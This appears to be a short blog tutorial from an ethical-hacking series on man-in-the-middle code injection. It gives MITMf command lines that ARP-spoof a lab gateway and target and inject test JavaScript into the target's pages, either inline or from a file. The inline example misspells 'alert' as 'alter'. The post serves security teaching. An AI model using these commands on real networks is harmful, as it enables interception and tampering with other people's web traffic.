Ethical Hacking - NETWORK PENETRATION TESTING(21)

MITM - Code Injection

  • Inject javascript or HTML code into pages.
  • Code gets executed on target machine.
  • Use - - inject plugin.

Code can be:

1. Stored on a local file --js-file or --html-file

2. Stored online --js-url or --html-url

3. Or you can supply the code through the terminal --js-payload or --html-payload

 

Usage Case 1:

python2 mitmf.py --arp --spoof -i eth0 --gateway 10.0.0.1 --targets 10.0.0.22 --inject --js-payload "alter('test');"

Ethical Hacking - NETWORK PENETRATION TESTING(21)

 

The inection code works.

Ethical Hacking - NETWORK PENETRATION TESTING(21)

 

 

Usage case2:

Edit the js file and save it as alert.js in the root folder.

alert('test');

Run the commands on the terminal.

python2 mitmf.py --arp --spoof -i eth0 --gateway 10.0.0.1 --target 10.0.0.22 --inject --js-file /root/alert.js

Ethical Hacking - NETWORK PENETRATION TESTING(21)

 

 The injection file works...

Ethical Hacking - NETWORK PENETRATION TESTING(21)

 

上一篇:wireshark可以抓HTTPS


下一篇:Python Ethical Hacking - VULNERABILITY SCANNER(8)